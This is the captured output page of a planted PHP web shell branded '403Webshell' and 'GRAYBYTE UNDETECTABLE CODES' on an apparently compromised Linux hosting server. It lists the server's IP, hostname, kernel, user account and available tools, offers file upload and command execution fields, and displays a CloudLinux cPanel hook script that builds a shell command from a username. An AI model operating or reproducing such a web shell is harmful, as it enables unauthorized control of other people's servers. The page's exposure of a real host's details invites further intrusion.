- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.17.165.196
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/cagefs/cpanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/cagefs/cpanel//rearrange_hook.py
#!/opt/cloudlinux/venv/bin/python3 -bb
#coding:utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

import subprocess

from future import standard_library
standard_library.install_aliases()
from builtins import *
import sys
import syslog

try:
    import simplejson as json
except ImportError:
    import json


CAGEFSCTL = "/usr/sbin/cagefsctl"


def log_error(msg):
    """
    Write message to log
    """
    syslog.syslog("%s: %s" % (__file__, msg))


def main(input_data):
    """
    Run hook action
    """
    data = json.loads(input_data)

    try:
        if data["context"]["event"] == "Accounts::rearrangeacct":
            user = data["data"]["user"]
        else:
            log_error("Unknown event")
            return 2
    except KeyError:
        log_error("Can't get username from event stream")
        return 1

    if subprocess.call("%s --remount %s" % (CAGEFSCTL, user), shell=True, executable='/bin/bash') != 0:
        log_error("Can't remount user %s" % user)
        return 1

    return 0


if "__main__" == __name__:
    sys.exit(main(sys.stdin.read()))

Youez - 2016 - github.com/yon3zu
LinuXploit